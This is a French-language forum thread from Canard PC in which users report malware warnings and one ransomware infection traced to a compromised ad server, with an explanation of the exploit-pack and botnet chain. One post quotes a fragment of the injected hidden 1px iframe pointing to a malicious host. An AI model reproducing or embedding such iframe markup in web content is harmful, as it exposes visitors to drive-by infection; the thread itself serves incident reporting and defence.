# Canard PC & Canardpc.com > Canard PC - Le site web >  Message d'avertissement de malware - OUI ON EST AU COURANT ! Le Pb est réglé.

## abelthorne

En voulant accéder à la première page du thread sur Mark of the Ninja, j'ai un message d'avertissement de la part de Chrome qui me dit que la page contient des saloperies en provenance de antiochofedgefield.com.

----------


## Aerial

Je relance en signalant que mon Kaspersky s'est illuminé à l'instant en me connectant sur la page d'accueil du forum en signalant un Trojan apparemment en provenance de pub2.canardpc.com.




AdBlock permet apparemment de corriger le problème...

----------


## Lucaxor

Pareil, Kaspersky s'affole au boulot.
Et de même, la réactivation de Ghostscript règle le soucis...

----------


## Durack

J ai avast qui s'affole ! 
appremment un probleme avec la banniere DL game ou du moins un message juste en dessous .

----------


## Flad

Même chose chez moi, et gros blocage de mon pc du taf aussi ^^

Et quand on active ad block : plus de message d'alerte.

----------


## Yog-Sothoth

Pareil avec Avast comme Durack, version gratuite, sur un portable win7 64 bits et internet explorer classique.
Du coup je vais arrêter pour aujourd'hui ça me sonne les oreilles à chaque page CPC.

----------


## _Uriel_

Même chose avec Avast, version gratuite, XP SP3 et Opera.

----------


## abelthorne

Et pour info, le problème que j'ai signalé il y a trois semaines en ouvrant ce thread est toujours là. Tout le monde s'en fout, chez CPC, des problèmes avec le site ? La rubrique est juste là pour décorer ?

----------


## Trichelieut

Même problème ici. Je le signale comme ça, la masse est plus grande encore.

----------


## alegria unknown

> ame src="http://sportop.c0m.li/yoO4TAbn2tpl5DltCfASJIZ2spEJPLSn" name="Alexa" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px">


J'ai un truc comme ça, juste sous le bandeau DL Gamer.

Edit: Comme sur la capture de Durack quoi  ::ninja::

----------


## Anonyme871

> En voulant accéder à la première page du thread sur Mark of the Ninja, j'ai un message d'avertissement de la part de Chrome qui me dit que la page contient des saloperies en provenance de antiochofedgefield.com.


Je viens de tester, j'ai le même souci.

----------


## RoRo123

Pareille Avast s'excite comme un fou !

----------


## gros_bidule

Bloquez ces fichues pubs, c'tout  :;): 
Au pire blindez un coup votre fichier hosts et à vous le surf tranquille ( ex de hosts pas gros et très bien gaulé pour bloquer énormément de pubs et url malveillantes : http://someonewhocares.org/hosts/ ). Ca évite aussi de devoir installer des extensions à la Adblocks & co.

----------


## Faboulous

De même chez moi jolie message de la part de KIS !

----------


## gros_bidule

Z'avez envoyé un mail au staff CPC ?

----------


## ElviejoDragon

Idem avec avast chez moi aujourd'hui.




> Bloquez ces fichues pubs, c'tout


Elles participent au financement de CPC, c'est un des rares sites où je n'active pas AdBlock.

----------


## RUPPY

Idem : j'ai ce message de Chrome lorsque je vais sur le topic de Mark of the ninja à cette adresse  ::O:   : http://forum.canardpc.com/threads/72...k+of+the+ninja

----------


## gros_bidule

Si ça le fait sur une page spécifique, ça ne serait pas la signature d'un coincoin comportant un lien malveillant ? (ché pas, j'affiche pas les signatures, marre des banderoles clignotantes CallOf/XBox/GrosKiki 300x500px de 2Mo)

----------


## abelthorne

Ça peut être une signature, un lien vers un site qui s'est retrouvé vérolé, une image hébergée sur un site qui s'est retrouvé vérolé...

----------


## gros_bidule

my0.02€. Mais si c'est ça, autant repérer et taper le gugus. Ca sera plus efficace. D'autant que là ce n'est pas du ressort de CPC (au pire ils ban le méchant coincoin, mais je ne vois pas ce qu'ils pourraient faire de plus).

----------


## mdo91

> my0.02€. Mais si c'est ça, autant repérer et taper le gugus. Ca sera plus efficace. D'autant que là ce n'est pas du ressort de CPC (au pire ils ban le méchant coincoin, mais je ne vois pas ce qu'ils pourraient faire de plus).


je vois pas trop comment un gus, en hébergeant une photo, aurait pu faire que toutes les sections soient infectées  ::):

----------


## abelthorne

Pas toutes les sections mais si le problème (celui dont je parle au début de ce thread, pas celui qui concerne la bannière de pub) vient de la signature de quelqu'un, il concerne chaque page où un de ses messages apparaît, donc potentiellement d'autres pages/threads.

----------


## ack

De fortes chances que ca soit automatique, c'est classique, une iframe qui load un exploit pour farmer du client pour un botnet. Ca essaie de lancer un applet java qui va infecter ceux qui ont le malheur de l'avoir installe sur leur PC. Si un admin passe par la, c'est mon domaine (secu IT), si vous voulez un coup de main ..

----------


## JPKoffe

Le "coupable" est frostphoenyx  avec son image de Darth Vador.

----------


## ack

Ça ne vient a priori pas d'une signature, et le code malicieux est présent sur toutes les pages (y compris la home) de ce que j'ai pu voir. Il faudra investiguer, mais il est possible que le vecteur de diffusion soit la régie de pub, méthode classique et qui fonctionne bien pour ceux qui cherchent a diffuser leurs exploits.

Un bout du code qu'on voit sur la page d'accueil : 



On voit le 

```
height="1px" width="1px"
```

 typique des iframe malware, et le nom de domaine suspect _sportop.c0m.li_

----------


## Crackhead Funky

J'ai aussi le soucis, signalé par KIS.

----------


## Nacodaco

Ah enfin ! Je galérais trois heures pour afficher chaque page, obliger d'actualiser une dizaine de fois...

-> Adblock et tout est rentré dans l'ordre !

----------


## Monsieur Cacao

découvert : cheval de Troie HEUR:Trojan.Script.Iframer	Le fichier: http://pub2.canardpc.com/www/deliver.../canardpc.com/

Je me joins à la plainte

----------


## Jelk

Mal réveillé, j'ai accepté la demande java pensant que c'était une des pubs qui fait vivre le site.

Pour votre information c'est donc un ransomware bien chiant.

En train d'essayer de débloquer le pc du bureau, cette saleté bloquant même le mode sans echec ( fermeture automatique de la session ).

----------


## mikelion

Idem, kaspersky détecte un trojan sur toutes les pages du forum.

----------


## ack

> Mal réveillé, j'ai accepté la demande java pensant que c'était une des pubs qui fait vivre le site.
> 
> Pour votre information c'est donc un ransomware bien chiant.
> 
> En train d'essayer de débloquer le pc du bureau, cette saleté bloquant même le mode sans echec ( fermeture automatique de la session ).


Essaie de trouver des infos sur ce ransomware précis sur le net. En général une fois que c'est installe, c'est cuit, même si tu payes.

----------


## Pontifex

Pour rejoindre ce que dit ack, après t'être renseigné sur la bête, tu pourrais tenter ta chance avec Kaspersky Rescue Disk: il s'agit d'un liveCD (ou USB) linux qui permet de virer les cochonneries bloquant Windows.

----------


## Lucaxor

Ce serait cool d'avoir une réaction des admins. Même si c'est pour dire que vous vous en occupez, ça fait toujours plaisir de ne pas avoir l'impression de pisser dans un violon (et c'est pas facile).

----------


## Monsieur Cacao

Adblock fonctionne sinon, en attendant mieux.

----------


## Jelk

Oui, oui kaspersky rescue tourne depuis deux heures en analyse complète, la fonction anti winlock étant étonnamment non disponible au premier boot. Si ça ne règle pas le problème j'ai récupéré les lignes de commande sur le site Kaspersky. Merci pour les recommandations.

----------


## ack

Le problème de ces saloperies c'est qu'elles savent maintenant faire bonne usage du chiffrement. Et un chiffrement solide, quand il est correctement implémenté, ça ne se casse pas. De plus, la plupart du temps le fait de payer ne change rien, tu n'obtiens pas la clé de déchiffrement. 

Plus d'infos ici : https://www.botnets.fr/index.php/Accueil

Seul conseil, ne laissez jamais Java installé sur votre machine. Déjà ça ne sert généralement a rien pour un user normal, et ce soft est un véritable puis sans fond de vulnérabilités. Ne pas utiliser sa session Admin pour surfer est également efficace. Quand aux antivirus ... Le site www.canardpc.com est détecté "Clean" sur de tous les moteurs de détection online (voir URLVoid et co), alors que le domaine sur lequel fait pointer le malware (.sportop.c0m.li) est recensé comme dangereux depuis plusieurs mois. Ca donne une idée de leur efficacité ..

edit : alors que le javascript n'est même pas obfusqué, on peut le voir en clair dans http://pub2.canardpc.com/www/deliver....canardpc.com/

----------


## Jelk

Pour java, je n'ai pas le choix, notre intranet en faisait pas mal usage.

A priori Kaspesky aurait réussis avec le windowsunlocker, le pc vient de démarrer et je n'ai pas de gentil policier m'annonçant que la zoophilie ça vaut 100 €. Merci pour les infos supplémentaires ack  ::): .

----------


## ack

Selon ton browser, tu peux le désactiver par défaut en navigation sur les zones "sensibles" (dont tout sauf l'intranet). Ça peut être mis en place au niveau des policy réseau, a voir avec vos admins donc.  

Content que tu aies retrouve ta machine  ::):  Par contre, dans la mesure ou l'exploit a pu s’exécuter, ton PC est probablement encore infecté (une fois qu'un code a pu s’exécuter en admin sur ta machine, même le meilleur AV n'y changera rien). Je te conseille vivement de faire réinstaller une image propre sur ton PC.

----------


## Jelk

J'ai juste clické sur le bouton d'acceptation pour exécuter java, chose que je n'aurais pas faite si j'avais été réveillé ce matin  ::): .

De toutes manières, cela fait tellement longtemps que la machine n'a pas été réinstallée qu'elle met plus de deux minutes à boot, il va falloir y passer  :;): .

Edit: Et je dois absolument garder Java sur les browsers pour d'autres types d'applications, dont les adresses ne me sont connues qu'au dernier moment, donc, je me nettoierais mieux les yeux le matin  :;): .

Enfin pour revenir au sujet: Attention, le virus offert par la régie pub qui officie sur canard PC est quelque chose de bien chiant. Kaspersky rescue 10 "obligatoire" .

L'adresse pour l'iso: http://rescuedisk.kaspersky-labs.com..._rescue_10.iso

Et le lien pour la transformation en usb: http://rescuedisk.kaspersky-labs.com...rescue2usb.exe

Bon  courge aux gens aussi bêtes que moi sur ce coups  :;): .

----------


## Durack

Pour Java c est un peu indispensable malheureusement , par contre vous pouvez utiliser un module  pour firefox  qui s'appel  Noscript qui bloque une partie des script java .

----------


## callicles

> Pour Java c est un peu indispensable malheureusement


Pas pour le net de tous les jours, hors malchance de travailler sur une plateforme type intranet conçue avec des applets (cette connerie...).
C'est tellement la foire aux failles en ce moment qu'il vaut mieux au moins désactiver le plugin des navigateurs.

Et il me semble que noscript ne bloque pas "une partie" mais tout javascript/java/flash hors liste blanche définie par l'utilisateur.

Enfin, alternative à Adblock dans le cas présent : Ghostery, qui rempli d'autres tâches également.

----------


## Tomaka17

J'ai l'impression que le problème est un peu flou, mais chez moi Chrome m'indique que le site contient un malware (screenshot).

À noter que si je vais dans "paramètres avancés" puis "obtenir plus de détails", il me dit qu'il n'a rien trouvé de suspect.




> Adblock fonctionne sinon, en attendant mieux.


Ca me le fait quand même malgré Adblock qui est activé.

----------


## Maximelene

Idem ici, malgré le :




> Ce site n'est actuellement pas répertorié comme suspect.

----------


## Anton

Bon bah depuis cette AM je vous rejoins, on a aussi la grosse page d'alerte rouge FF comme quoi CPC est devenu un site malveillant, plus le bandeau rouge une fois qu'on a validé.

----------


## Rekeem

La même, une fois la pub bloquée ça roule

----------


## nesquik

Encore un coup de la concurrence !  ::o:

----------


## Izual

> Bon bah depuis cette AM je vous rejoins, on a aussi la grosse page d'alerte rouge FF comme quoi CPC est devenu un site malveillant, plus le bandeau rouge une fois qu'on a validé.


Idem ici.

----------


## JulLeBarge

meme souci chez moi:


et j'ai le souci sur tof.canardpc.com aussi

----------


## Jolaventur

CPC est un site malveillant 
Parait même qu'ils éditent un magazine subversif avec des test de jeux console.

----------


## Cedski

Je viens d'avoir la même...

----------


## HPEC

De même. (Firefox)

Tout était encore OK il y a 15 minutes.

----------


## beuargh

Tout pareil  ::):

----------


## Triz'

Première fois pour moi à l'instant. Site signalé comme malveillant.

----------


## ekOz

Le même, et idem sur tof. Faut se réveiller les mecs.

----------


## deathdigger

Hier soir en me connectant sur la page d'accueil du forum cpc via IE (je venais d'installer mon OS), il m'a dit qu'il voulait effectivement lancer Java (qui heureusement n'est pas installé), et là je viens d'être bloqué par Firefox.

----------


## gregounech

Pareil

---------- Post added at 19h03 ---------- Previous post was at 19h02 ----------

En plus, supreme du chiantisme, ca le fait a chaque ouverture d'onglet vers le domaine canardpc.com  :Emo: .

----------


## Ramis

C'Y Quoi s'bouldel ?
J'y complend pas poulquoa ly navigatoré y vout pas mou laicher ligalder mone site qué moa jy pléfèle.
Le chlome là y dicoune un peu là non ?
et toi mou Canald tou fy koa poul ty défondle contle ly attak dy méchons virouzes ? Hein ? Ty fy koa ?

----------


## Ratcochon 2

Internet m'a prévenu en entrant ici que ce site est malveillant ! je n'aurai pas cru ça de CPC !  ::sad:: 
Que cache ce site ? une couverture pour un réseau pédophile ? (Pas étonant vu le lapin rose ! de quoi attirer les nenfants ! ) un projet de résurrection de l'Axe du Mal ?   :Gerbe:

----------


## Tomaka17

Ce mec dit qu'il traîne sur les forums de google et qu'il n'a encore jamais vu un faux positif malgré le nombre de gens qui viennent se plaindre à cause de ça :
http://blog.aw-snap.info/2011/01/mal...-positive.html

----------


## touriste

Ouais Chrome me dit que le site est malveillant et quand je demande du détail, il me dit qu'il n'a jamais trouvé un malware. Wtf !?

----------


## Nacodaco

Ben la c'est pas un faux positif de toute façon, il y a bel et bien une saloperie de CPC.

Par contre il fait quoi au juste le truc ? (C'est quoi un ransomware ?) On le remarque si on l'a choppé ?

----------


## Pimûsu

Tout pareil  ::): 

Le site comme le forum, même mon plugin de tab qui affiche un aperçu du site me déclenche cette page.



Si ça peut aider au diag...

Browser : Version 24.0.1312.56 m  Google Chrome est à jour.

----------


## Lee Tchii

Hier Avira criait et aujourd'hui chrome se met de la partie.
Ya un truc pas clair sur le forum CPC  ::o:

----------


## Zorglomme

Idem. Site d'illuminazi.

----------


## jujupatate

Je me joins à la foule, avertissement au lancement de FF.

----------


## Anonyme871

Pareil, plus moyen d'accéder au forum à partir de chrome sans avoir un avertissement.

----------


## Babz

Je viens reporter en tant qu'utilisateur de firefox que le forum *ET* le site m'ont balancé cet erreur alacon™.

----------


## deathdigger

> Ben la c'est pas un faux positif de toute façon, il y a bel et bien une saloperie de CPC.
> 
> Par contre il fait quoi au juste le truc ? (C'est quoi un ransomware ?) On le remarque si on l'a choppé ?


Ransomware, c'est genre un message qui te dit que tu dois payer pour débloquer ton pc (genre message du fbi ou du commissariat d'internet en attaques assez récentes)

----------


## weedkiller

Ca vient de me le faire sous firefox, et j'ai fait comme tout le monde j'imagine : "ignorer l'avertissement". L'installation du programme malveillant est automatique ou il fallait cliquer sur un popup java pour le lancer ? (peut être Adblock l'a bloqué).

Sinon c'est étonnant qu'aucun admin ne soit venu dire quelquechose sur ce topic. Quelqu'un les a prévenu ?

----------


## Aghora

Idem ici. Firefox.

Putain j'ai honte. J'ai honte de mon forum.

----------


## Strife

Idem, je me joins au reste de la foule, message bloquant le site sous firefox.

----------


## olaf

La même sur chrome.

----------


## Carez

Il est un peu tard pour eux non? 19h, ya plus personne !

----------


## Okxyd

Google s'y met:

----------


## TarteAuxFleurs

Qui se dévoue pour MP un modo/redacteur/Teraboule ?

----------


## Projet 154

> Je viens reporter en tant qu'utilisateur de firefox que le forum *ET* le site m'ont balancé cet erreur alacon™.


J'ai la même chose que le monsieur en citation (pour allonger encore un peu la liste)

----------


## Jeckhyl

Va falloir rappeler Half.

----------


## Jolaventur

> Va falloir rappeler Half.


Il est toujours vivant Half?

----------


## JulLeBarge

y'a une solution en attendant ? J'ai essayé de bloquer la pub avec AdBlock mais ça ne change rien.

Et sinon normal que MSE (antivirus microsoft) ne bronche pas ?

----------


## deathdigger

> Il est toujours vivant Half?


à moitié.

----------


## DeadFish

La même ici.

Il y a peut être un lien avec les topics bizarres qui fleurissent en ce moment ? D'autant que, coïncidence ou pas, j'ai eu l'avertissement autour de 19h 15, soit pile poil en même temps que lesdits topics des sections voisines.

----------


## Toto0o0o0o

Du contenu a été inséré dans cette page web par *sportobene.c0m.li*, un distributeur de logiciels malveillants connus. En consultant cette page, vous risquez d'infecter votre ordinateur avec des logiciels malveillants.
En insistant un peu on peut quand même se connecter.

----------


## djil74

Pareil sous firefox.
Bizarre de la part d'un tel site.

----------


## grouf

idem sous firefox. 


Avec "plus d'infos" je tombe sur ça: http://safebrowsing.clients.google.c....canardpc.com/

----------


## n3os

Tiens moi aussi aujourd'hui.

----------


## Tomaka17

> à moitié.


Tu veux dire qu'il a une half life ?  :tired:

----------


## Ulrick Popoff

Canard pc c'est le mal

----------


## M0zArT

Je crois qu'en plus le site se bouffe du mass spam de topic : http://forum.canardpc.com/forums/18-...et-r%C3%A9seau

----------


## Le Nihilanth

Pareil ici avec Firefox, ça se généralise apparemment.

----------


## KiwiX

Le Mali. Les attaques terroristes. 

Messieurs, il est temps de résister à l'envahisseur.







Ou alors, on s'en va.

----------


## Okxyd

Alerte ! On est attaqué !

----------


## Genchou

C'est tout le domaine *.canardpc.com qui est dans le rouge (chrome et FF).
Ca inclut donc le forum, l'accueil, tof, etc.

----------


## Pyjama Wallon

Pareil sous Firefox.

----------


## BlueTemplar

Pareil, avec le message sur sportobene.c0m.li.

----------


## Terrestrial

Mais que font les autorités.

----------


## jaragorn_99

Bon je viens d'y avoir droit aussi avec chrome.

----------


## Babz

> Alerte ! On est attaqué ! 
> http://uashome.alaska.edu/~dfgriffin...earlharbor.gif


We are under attack !

----------


## ack

Pour résumer ce qui se passe :

- un bot d'infection (très peu de chance que ce soit une personne) a trouvé un moyen d’écrire du code dans les fichiers php hébergés sur pub2.canardpc.com (en l’occurrence, 
pub2.canardpc.com/www/delivery/ajs.php)
- il a injecté du code dans ce fichier qui ajoute une iframe malicieuse sur toutes les pages (ou presque) du site
- la iframe ("invisible" car 1px sur 1px) force les utilisateurs à accéder à un contenu hébergé sur hxxp://sporttop.c0m.li
- le contenu en question est un exploit pack, en gros une collection d'exploits qui sont lancés successivement contre les navigateurs des utilisateurs jusqu’à ce que l'un d'eux fonctionne. Un de ces exploits utilise une vulnérabilité de Java, d'ou l'applet Java qui essaie de se lancer sur les PC des victimes. 
- une fois l'exploitation réussie, le PC de la victime devient un "zombie" et fait désormais partie d'un botnet, c'est a dire que l'attaquant peut contrôler le PC a distance via des serveurs (command & control)
- l'attaquant (le plus souvent) loue ensuite son/ses botnet a ceux qui en ont besoin (pour des campagnes de spam souvent, ou pour lancer d'autres vagues d'attaques). Ici l'attaquant s'en sert pour installer un ranconware, un logiciel qui chiffre le disque dur de l'utilisateur et lui demande de payer pour avoir la clé de déchiffrement et regagner l’accès a sa machine.

Outre que des visiteurs se retrouvent ainsi dans des botnets, le problème pour le propriétaire du site c'est que Google et consorts le blacklistent, et que ça peut prendre un peu de temps pour se refaire white-lister. Et avant ca, en plus de supprimer le contenu malicieux du fichier php, faut trouver par quelle faille / défaut de configuration l'attaquant est passé pour écrire dedans, histoire qu'il revienne pas 24h plus tard.

TLDR: Désactivez tous les plugins de vos navigateurs (java, flash notamment) en visitant le site.

----------


## Vladtepes

Ouaip, ils sont pas très sélectifs dans leurs interdictions.

----------


## weedkiller

> Et sinon normal que MSE (antivirus microsoft) ne bronche pas ?


De mon côté MSE n'a jamais bronché qu'après des scan volontaires. 2 trucs louches chopés, et il ne m'avait jamais rien dit.

----------


## ekOz

> Pour résumer ce qui se passe :
> 
> - un bot d'infection (très peu de chance que ce soit une personne) a trouvé un moyen d’écrire du code dans les fichiers php hébergés sur pub2.canardpc.com (en l’occurrence, 
> pub2.canardpc.com/www/delivery/ajs.php)
> - il a injecté du code php dans ce fichier qui ajoute une iframe malicieuse sur toutes les pages (ou presque) du site
> - la iframe ("invisible" car 1px sur 1px) force les utilisateurs à accéder à un contenu hébergé sur hxxp://sporttop.c0m.li
> - le contenu en question est un exploit pack, en gros une collection d'exploits qui sont lancés successivement contre les navigateurs des utilisateurs jusqu’à ce que l'un d'eux fonctionne. Un de ces exploits utilise une vulnérabilité de Java, d'ou l'applet Java qui essaie de se lancer sur les PC des victimes. 
> - une fois l'exploitation réussie, le PC de la victime devient un "zombie" et fait désormais partie d'un botnet, c'est a dire que l'attaquant peut contrôler le PC a distance via des serveurs (command & control)
> - l'attaquant (le plus souvent) loue ensuite son/ses botnet a ceux qui en ont besoin (pour des campagnes de spam souvent, ou pour lancer d'autres vagues d'attaques). Ici l'attaquant s'en sert pour installer un ranconware, un logiciel qui chiffre le disque dur de l'utilisateur et lui demande de payer pour avoir la clé de déchiffrement et regagner l’accès a sa machine.
> ...


Ça fait peur dis-donc, je vais aller me mbamiser de ce pas.

----------


## Babz

> Pour résumer ce qui se passe :
> 
> - un bot d'infection (très peu de chance que ce soit une personne) a trouvé un moyen d’écrire du code dans les fichiers php hébergés sur pub2.canardpc.com (en l’occurrence, 
> pub2.canardpc.com/www/delivery/ajs.php)
> - il a injecté du code php dans ce fichier qui ajoute une iframe malicieuse sur toutes les pages (ou presque) du site
> - la iframe ("invisible" car 1px sur 1px) force les utilisateurs à accéder à un contenu hébergé sur hxxp://sporttop.c0m.li
> - le contenu en question est un exploit pack, en gros une collection d'exploits qui sont lancés successivement contre les navigateurs des utilisateurs jusqu’à ce que l'un d'eux fonctionne. Un de ces exploits utilise une vulnérabilité de Java, d'ou l'applet Java qui essaie de se lancer sur les PC des victimes. 
> - une fois l'exploitation réussie, le PC de la victime devient un "zombie" et fait désormais partie d'un botnet, c'est a dire que l'attaquant peut contrôler le PC a distance via des serveurs (command & control)
> - l'attaquant (le plus souvent) loue ensuite son/ses botnet a ceux qui en ont besoin (pour des campagnes de spam souvent, ou pour lancer d'autres vagues d'attaques). Ici l'attaquant s'en sert pour installer un ranconware, un logiciel qui chiffre le disque dur de l'utilisateur et lui demande de payer pour avoir la clé de déchiffrement et regagner l’accès a sa machine.
> ...


La question reste, est-ce que ad-block bloque cette saloperie de bidule en 1px par 1px ?

----------


## Testoide

On risque de se faire infecter pour de vrai ?

----------


## ack

> La question reste, est-ce que ad-block bloque cette saloperie de bidule en 1px par 1px ?


Je connais pas adblock en détail, mais grosso-modo la iframe qui pointe sur un autre domaine c'est une méthode employée pour un tas d'autres choses que la diffusion de malwares. Donc bloquer ça ça revient a bloquer pas mal de fonctionnalités des sites modernes.

Quand a l'exploit-pack, il n'y a pas de protection "fixe" a ça, dans la mesure ou les exploits changent tous les jours, de nouvelles vulnérabilités sont découvertes régulièrement (thanks Java). 

La "parade" a ça la plus employée, c'est de black-lister les domaines qui diffusent les malware, et il y a toujours un temps de retard cote antivirus.

Edit : visiblement oui il peut le faire.



> Like Mozilla's built-in image blocker, Adblock blocks HTTP requests according to their source address and can block iframes, scripts, and Flash.

----------


## Strife

Noscript bloque des Javascript. (<SCRIPT>:33 <OBJECT>:0)

----------


## gros_bidule

Si ton navigateur est à jour, ton plugin Flash (et éventuellement Java & Silverlight, si tu les as activé) est à jour, et que tu ne cliques pas bêtement sur le bouton OK d'une grosse fenêtre, non, tu n'attraperas rien.
Aujourd'hui, tu as plus de chance de choper quelque chose en faisant des galipettes qu'avec un ordinateur un minimum entretenu.

----------


## Anonyme1023

Sophos à hurler toute la journée quand j'étais au boulot.
Là, c'est mon Chrome qui refuse la connexion.

Soit...

----------


## olih

C'est bizarre.
Maintenant, si je vais directement sur forum.canardpc.com, je n'ai plus d'avertissement de firefox.
Par contre, si je passe par www.canardpc.com, là oui. Idem pour tof.

----------


## Dark Fread

Dites donc c'est louche votre truc. D'autant plus que je me suis pris un malware (mon premier en 10 ans, peut-être...) hier après-midi (et je suis sous Opera, il ne m'indique rien de dangereux lui par contre), le truc relou qui bloque l'ordi en imitant un message de police. Si c'est une coïncidence, elle est bien tombée  :^_^:

----------


## Testoide

Il y a un moyen de savoir si on s'est fait infecté où pas ? En voyant dans la base de registre par exemple ? Malwarebytes trouverait quelque chose ?

----------


## Argha

Page d'accueil de cpc

page


Message de la page de diagnostique  Google  ::lol::  :




> Navigation sécurisée
> Page de diagnostic pour canardpc.com
> 
> Quel est l'état actuel du site canardpc.com ?
> 
>     Ce site est répertorié comme suspect. Une visite sur celui-ci peut endommager votre ordinateur.
> 
> Que s'est-il passé lors de la visite de ce site par le robot Google ?
> 
> ...


J'ai eu un blocage firefox sur tof cpc en faisant l'upload.

----------


## Gigax

Même chose sur Safari.

----------


## Avik

Autant chez moi je m'en fout je peut bidouiller, mais boulot je vais encore me faire taper sur les doigts.
parce que j'ai ramené des virus alors qu'on a une install trafiquée foireuse qui demande 2H de boulot a un informaticien au moindre grain de sable dans la machine.  ::(: 
Fait iech.

----------


## Grosnours

Oui ce serait bien de faire un post récapitulatif complet, comme ack a commencé à le faire avec :
- qu'est-ce qui se passe
- comment s'en protéger
- comment savoir si on est infecté ou non
- comment s'en débarrasser si on est infecté

Merci.  :;):

----------


## ducon

Je viens d’avoir le bidule sous Linusque alors que je n’avais rien jusqu’à présent mais rien au taf avec un vieux Firefox.

----------


## ack

> Il y a un moyen de savoir si on s'est fait infecté où pas ? En voyant dans la base de registre par exemple ? Malwarebytes trouverait quelque chose ?


Les antivirus peuvent le détecter (y compris celui gratuit de MS, qui est pas mal il faut le reconnaître). Ça dépend des exploits utilisés et de ce que l'attaquant fait sur ta machine. Une attaque sophistiquée sera indétectable, quelle que soit la solution utilisée (heuristique ou signatures), mais 95% du temps les attaquant utilisent du code déjà connu des éditeurs d'AV, auquel cas l'AV doit le détecter.

Edit : quelle que soit la solution AV que vous utilisez, préférez les scans depuis un Live-cd aux scans directement depuis votre Windows.

edit2 : j'essaierai de faire un truc clair comme propose Grosnours si j'ai le temps ce soir.

----------


## Testoide

Ce qui me fait chier c'est que tout à l'heure je me connectes sur canardpc (avec firefox, adblock et noscript mais qui autorise cpc, pas de java sur mon pc) j'ai pu me connecté et posté dans les bons plans sans problèmes mais là j'ai l'erreur comme vous avez tous (j'suis sur ipad, l'inviolable là)

J'ai peur d'avoir mangé une saloperie. J'aimerais bien savoir si je l'ai ou pas mais avast m'a rien trouvé au moment ou j'étais sur cpc.

----------


## Pimûsu

@Dark, c'est toi qui a vérolé le site en fait avec ton pc malwaré ^^ !

----------


## SeXyChacal

Même problème ici!

----------


## Le Sanglier

Pareil, depuis quelques heures j'ai une alerte a pratiquement chaque page du forum et site web:

----------


## Tonton_Ben-J

Pareil pour le message d'avertissement navigateur, mais pas de virus en vu, j'utilise adblock  ::trollface::

----------


## xALF

> Navigation sécurisée
> Page de diagnostic pour canardpc.com
> 
> Quel est l'état actuel du site canardpc.com ?
> Ce site est répertorié comme suspect. Une visite sur celui-ci peut endommager votre ordinateur.
> 
> Que s'est-il passé lors de la visite de ce site par le robot Google ?
> Sur les 152 pages du site que nous avons testées au cours des 90 derniers jours, un certain nombre (0) entraînait le téléchargement et l'installation de logiciels malveillants sans l'autorisation de l'utilisateur. La dernière visite effectuée par le robot Google sur ce site a eu lieu le 2013-01-28 et aucun contenu suspect n'a été détecté sur celui-ci au cours des 90 derniers jours.
> Ce site était hébergé sur 2 réseau(x), y compris AS29169 (GANDI), AS15169 (Google Internet Backbone).
> ...


Etrange

----------


## Gladia

Salut,

C'est un peu flippant avec les explications. Le pire c'est qu'il faut autoriser l'affichage du site pour lire qu'il faut faire gaffe, désactiver un tas de machin et se tenir au courant de la situation et des éventuelles solutions  :^_^: .

@Au-dessus : J'ai adBlock, mais il était désactivé sur CPC (et quelques autres sites). Du coup je l'ai réactivé, dommage si cela rapportait quelque chose à certains :/.

----------


## fofo

Je pense que c'est une pub vérolée.

http://pub2.canardpc.com/ est down, et aucune pub ne s'affiche plus sur la page d’accueil.

Je pense que canardpc a due avoir une pub vérolée, et ils ont dans l'urgence éteint le serveur pub.

----------


## Testoide

Je fais un scan total avec avast, ensuite je le vire et j'installe kaspersky en version d'évaluation pour voir si tout est clean.
Si les deux trouvent rien vous pensez que c'est bon y a plus rien à craindre ?
J'en ai pour la nuit, merci mr. le bot.

----------


## Evene

En tout cas ça casse les c.... , sous chrome tu peux pas lui dire d'aller se faire foutre une bonne fois pour toute ?

----------


## Aghora

Il y a quelques spambots qui en ont profité...

----------


## Jeckhyl

Ici pas de problème, Firefox est passé dans le rouge mais derrière Kaspersky veille en tâche de fond et n'a pas sourcillé (alors que question parano, Kaspersky se pose là).

Bref je ne suis pas inquiet.

----------


## Testoide

Moi ça me rend fou souvent ces histoires et je finis par formater.
Je l'ai souvent fait pour moins que ça.  ::ninja::

----------


## Mysterius

Même problème, Chrome me dit que le site est infecté. Ca a commencé aujourd'hui pour moi.

----------


## Oncle_Bob

> Ca vient de me le faire sous firefox, et j'ai fait comme tout le monde j'imagine : "ignorer l'avertissement". L'installation du programme malveillant est automatique ou il fallait cliquer sur un popup java pour le lancer ? (peut être Adblock l'a bloqué).
> 
> Sinon c'est étonnant qu'aucun admin ne soit venu dire quelquechose sur ce topic. Quelqu'un les a prévenu ?





> Salut,
> 
> C'est un peu flippant avec les explications. Le pire c'est qu'il faut autoriser l'affichage du site pour lire qu'il faut faire gaffe, désactiver un tas de machin et se tenir au courant de la situation et des éventuelles solutions .
> 
> @Au-dessus : J'ai adBlock, mais il était désactivé sur CPC (et quelques autres sites). Du coup je l'ai réactivé, dommage si cela rapportait quelque chose à certains :/.


Ça vient de m'arriver aussi, sous Firefox. Et moi aussi, j'ai mis "ignorer l'avertissement", pour pouvoir de nouveau accéder au site et au forum. Du coup, je dois m’inquiéter ? Là, je scanne tout ce que je peux avec tout ce que j'ai. C'est affolant les proportions que prend ce truc. L'incident était isolé en début de journée, quand j'ai remarqué ce topic.





> CPC est un site malveillant 
> Parait même qu'ils éditent un magazine subversif avec des test de jeux console.


 Hahaha.  ::P:

----------


## sissi

Question conne d'un noob en sécurité: et les navigateurs mobiles utilisant javascript dans tout ça ?

----------


## Mapper

Ah je vois que je ne suis pas le seul concerné.

Bizarrement j'ai ce message alors que j'ai Adblock d'activé...

(après je n'ai pas lu les 4 pages entières)

----------


## Flad

> En tout cas ça casse les c.... , sous chrome tu peux pas lui dire d'aller se faire foutre une bonne fois pour toute ?


Si, en cliquant sur "parametre avancé" qd tu as l'écran d'alerte  :;):

----------


## gros_bidule

Les infectés potentiels : vous avez une sauvegarde de votre Windows ?
Parce que voir une alerte de sécurité, dire "ignorer" pour ensuite s'inquiéter, c'est quand même pas très malin hein  :;): 
Vous restaurez une sauvegarde et basta, ainsi vous n'aurez pas à vivre avec la terrible crainte de ne pas savoir si vous avez chopé un truc. Et la prochaine fois vous ne vous comporterez pas comme le grand père qui clique tout le temps sur les pubs "Réclamez votre gain de 2M€".

----------


## Augusto Giovanni

Pareil ici.

----------


## Alliante

Le problème n'a pas l'air de venir du forum mais d'une pub sur le site du coup je pense que Google à blacklisté le tout mais rien de dramatique il me semble.

----------


## Oncle_Bob

> Parce que voir une alerte de sécurité, dire "ignorer" pour ensuite s'inquiéter, c'est quand même pas très malin hein
